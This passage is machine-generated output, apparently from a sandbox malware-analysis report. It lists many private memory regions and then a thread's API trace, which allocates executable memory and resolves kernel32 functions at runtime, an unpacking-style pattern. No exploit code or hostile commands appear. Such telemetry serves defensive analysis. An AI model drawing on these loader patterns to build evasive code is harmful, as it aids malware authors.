entry_point = 0x0 region_type = private name = "private_0x0000000003280000" filename = "" Region: id = 2144 start_va = 0x3290000 end_va = 0x3290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 2145 start_va = 0x32a0000 end_va = 0x32a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032a0000" filename = "" Region: id = 2146 start_va = 0x32b0000 end_va = 0x32b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032b0000" filename = "" Region: id = 2147 start_va = 0x32c0000 end_va = 0x32c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 2148 start_va = 0x32d0000 end_va = 0x32d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032d0000" filename = "" Region: id = 2149 start_va = 0x32e0000 end_va = 0x32e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 2150 start_va = 0x32f0000 end_va = 0x32f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 2151 start_va = 0x3300000 end_va = 0x3300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 2152 start_va = 0x3310000 end_va = 0x3310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003310000" filename = "" Region: id = 2153 start_va = 0x3320000 end_va = 0x3320fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 2154 start_va = 0x3330000 end_va = 0x3330fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 2155 start_va = 0x3340000 end_va = 0x3340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003340000" filename = "" Region: id = 2156 start_va = 0x3350000 end_va = 0x3350fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003350000" filename = "" Region: id = 2157 start_va = 0x3360000 end_va = 0x3360fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003360000" filename = "" Region: id = 2158 start_va = 0x3370000 end_va = 0x3370fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003370000" filename = "" Region: id = 2159 start_va = 0x3380000 end_va = 0x3380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003380000" filename = "" Region: id = 2160 start_va = 0x3390000 end_va = 0x3390fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 2161 start_va = 0x33a0000 end_va = 0x33a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033a0000" filename = "" Region: id = 2162 start_va = 0x33b0000 end_va = 0x33b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033b0000" filename = "" Region: id = 2163 start_va = 0x33c0000 end_va = 0x33c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033c0000" filename = "" Region: id = 2164 start_va = 0x33d0000 end_va = 0x33d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033d0000" filename = "" Region: id = 2165 start_va = 0x33e0000 end_va = 0x33e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 2166 start_va = 0x33f0000 end_va = 0x33f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033f0000" filename = "" Region: id = 2167 start_va = 0x3400000 end_va = 0x3400fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 2168 start_va = 0x3410000 end_va = 0x3410fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003410000" filename = "" Region: id = 2169 start_va = 0x3420000 end_va = 0x3420fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003420000" filename = "" Region: id = 2170 start_va = 0x3430000 end_va = 0x3430fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003430000" filename = "" Region: id = 2171 start_va = 0x3440000 end_va = 0x3440fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003440000" filename = "" Region: id = 2172 start_va = 0x3450000 end_va = 0x3450fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 2173 start_va = 0x3460000 end_va = 0x3460fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003460000" filename = "" Region: id = 2174 start_va = 0x3470000 end_va = 0x3470fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003470000" filename = "" Region: id = 2175 start_va = 0x3480000 end_va = 0x3480fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003480000" filename = "" Region: id = 2176 start_va = 0x3490000 end_va = 0x3490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003490000" filename = "" Region: id = 2177 start_va = 0x34a0000 end_va = 0x34a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034a0000" filename = "" Region: id = 2178 start_va = 0x34b0000 end_va = 0x34b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034b0000" filename = "" Region: id = 2179 start_va = 0x34c0000 end_va = 0x34c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034c0000" filename = "" Region: id = 2180 start_va = 0x34d0000 end_va = 0x34d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034d0000" filename = "" Region: id = 2181 start_va = 0x34e0000 end_va = 0x34e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034e0000" filename = "" Region: id = 2182 start_va = 0x34f0000 end_va = 0x34f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000034f0000" filename = "" Region: id = 2183 start_va = 0x3500000 end_va = 0x3500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 2184 start_va = 0x3510000 end_va = 0x3510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003510000" filename = "" Region: id = 2185 start_va = 0x3520000 end_va = 0x3520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003520000" filename = "" Region: id = 2186 start_va = 0x3530000 end_va = 0x3530fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003530000" filename = "" Region: id = 2187 start_va = 0x3540000 end_va = 0x3540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 2188 start_va = 0x3550000 end_va = 0x3550fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003550000" filename = "" Region: id = 2189 start_va = 0x3560000 end_va = 0x3560fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003560000" filename = "" Region: id = 2190 start_va = 0x3570000 end_va = 0x3570fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003570000" filename = "" Region: id = 2191 start_va = 0x3580000 end_va = 0x3580fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003580000" filename = "" Region: id = 2192 start_va = 0x3590000 end_va = 0x3590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 2193 start_va = 0x35a0000 end_va = 0x35a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035a0000" filename = "" Region: id = 2194 start_va = 0x35b0000 end_va = 0x35b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2195 start_va = 0x35c0000 end_va = 0x35c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035c0000" filename = "" Region: id = 2196 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035d0000" filename = "" Region: id = 2197 start_va = 0x35e0000 end_va = 0x35e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035e0000" filename = "" Region: id = 2198 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2199 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2200 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2201 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2202 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2203 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2204 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2205 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2206 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2207 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2208 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2209 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2210 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2211 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2212 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2213 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2214 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2215 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2216 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2217 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2218 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2219 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2220 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2221 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2222 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2223 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2224 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2225 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2226 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2227 start_va = 0x35f0000 end_va = 0x35f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2228 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2229 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2230 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2231 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2232 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2233 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2234 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2235 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2236 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2237 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2238 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2239 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2240 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2241 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2242 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2243 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2244 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2245 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2246 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2247 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2248 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2249 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2250 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2251 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2252 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2253 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2254 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2255 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2256 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2257 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2258 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2259 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2260 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2261 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2262 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2263 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2264 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2265 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2266 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2267 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2268 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2269 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2270 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2271 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2272 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2273 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2274 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2275 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2276 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2277 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2278 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2279 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2280 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2281 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2282 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2283 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2284 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2285 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2286 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2287 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2288 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2289 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2290 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2291 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2292 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2293 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2294 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2295 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2296 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2297 start_va = 0x2290000 end_va = 0x2290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 2298 start_va = 0x2290000 end_va = 0x2290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 2299 start_va = 0x2290000 end_va = 0x2290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 2300 start_va = 0x2290000 end_va = 0x2290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 2301 start_va = 0x2290000 end_va = 0x2290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 2302 start_va = 0x2290000 end_va = 0x2290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 2303 start_va = 0x2290000 end_va = 0x2290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 2304 start_va = 0x2290000 end_va = 0x2290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 2305 start_va = 0x2290000 end_va = 0x2290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 2306 start_va = 0x2290000 end_va = 0x2290fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 2307 start_va = 0x2380000 end_va = 0x2380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 2308 start_va = 0x2380000 end_va = 0x2380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 2309 start_va = 0x2380000 end_va = 0x2380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 2310 start_va = 0x2380000 end_va = 0x2380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 2311 start_va = 0x2380000 end_va = 0x2380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 2312 start_va = 0x2380000 end_va = 0x2380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 2313 start_va = 0x2380000 end_va = 0x2380fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002380000" filename = "" Region: id = 2314 start_va = 0x73550000 end_va = 0x73552fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2345 start_va = 0x3600000 end_va = 0x361ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Thread: id = 86 os_tid = 0xef0 [0147.926] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x1000, flProtect=0x40) returned 0x20c0000 [0148.867] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x1000, flProtect=0x40) returned 0x2120000 [0148.873] VirtualFree (lpAddress=0x20c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.892] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0148.893] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0148.893] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0148.893] VirtualAlloc (lpAddress=0x0, dwSize=0x546, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0148.894] VirtualFree (lpAddress=0x3a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.894] VirtualAlloc (lpAddress=0x0, dwSize=0x44400, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0148.929] VirtualFree (lpAddress=0x3a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.932] VirtualAlloc (lpAddress=0x0, dwSize=0x1600, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0148.933] VirtualFree (lpAddress=0x3a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.933] VirtualAlloc (lpAddress=0x0, dwSize=0x1400, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0148.933] VirtualFree (lpAddress=0x3a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.934] VirtualAlloc (lpAddress=0x0, dwSize=0x3400, flAllocationType=0x1000, flProtect=0x4) returned 0x3a0000 [0148.934] VirtualFree (lpAddress=0x3a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.935] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x769b0000 [0148.935] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentThreadId") returned 0x769c1430 [0148.935] GetProcAddress (hModule=0x769b0000, lpProcName="DeleteCriticalSection") returned 0x77a145f5 [0148.935] GetProcAddress (hModule=0x769b0000, lpProcName="LeaveCriticalSection") returned 0x77a02270 [0148.935] GetProcAddress (hModule=0x769b0000, lpProcName="EnterCriticalSection") returned 0x77a022b0 [0148.935] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSection") returned 0x77a12c42 [0148.935] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualFree") returned 0x769c184e [0148.935] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualAlloc") returned 0x769c1836 [0148.935] GetProcAddress (hModule=0x769b0000, lpProcName="LocalFree") returned 0x769c2cec [0148.935] GetProcAddress (hModule=0x769b0000, lpProcName="LocalAlloc") returned 0x769c166c [0148.935] GetProcAddress (hModule=0x769b0000, lpProcName="VirtualQuery") returned 0x769c4412 [0148.935] GetProcAddress (hModule=0x769b0000, lpProcName="WideCharToMultiByte") returned 0x769c16ed [0148.935] GetProcAddress (hModule=0x769b0000, lpProcName="MultiByteToWideChar") returned 0x769c190e [0148.936] GetProcAddress (hModule=0x769b0000, lpProcName="lstrlenA") returned 0x769c5a03 [0148.936] GetProcAddress (hModule=0x769b0000, lpProcName="lstrcpynA") returned 0x769d18e2 [0148.936] GetProcAddress (hModule=0x769b0000, lpProcName="lstrcpyA") returned 0x769e2a6d [0148.936] GetProcAddress (hModule=0x769b0000, lpProcName="LoadLibraryExA") returned 0x769c48cb [0148.936] GetProcAddress (hModule=0x769b0000, lpProcName="GetThreadLocale") returned 0x769c357f [0148.936] GetProcAddress (hModule=0x769b0000, lpProcName="GetStartupInfoA") returned 0x769c0e00 [0148.936] GetProcAddress (hModule=0x769b0000, lpProcName="GetProcAddress") returned 0x769c1222 [0148.936] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleHandleA") returned 0x769c1245 [0148.936] GetProcAddress (hModule=0x769b0000, lpProcName="GetModuleFileNameA") returned 0x769c1491 [0148.936] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoA") returned 0x769dd5b5 [0148.936] GetProcAddress (hModule=0x769b0000, lpProcName="GetLastError") returned 0x769c11c0 [0148.936] GetProcAddress (hModule=0x769b0000, lpProcName="GetCommandLineA") returned 0x769c5159 [0148.936] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibrary") returned 0x769c3478 [0148.937] GetProcAddress (hModule=0x769b0000, lpProcName="FindFirstFileA") returned 0x769ce286 [0148.937] GetProcAddress (hModule=0x769b0000, lpProcName="FindClose") returned 0x769c43fa 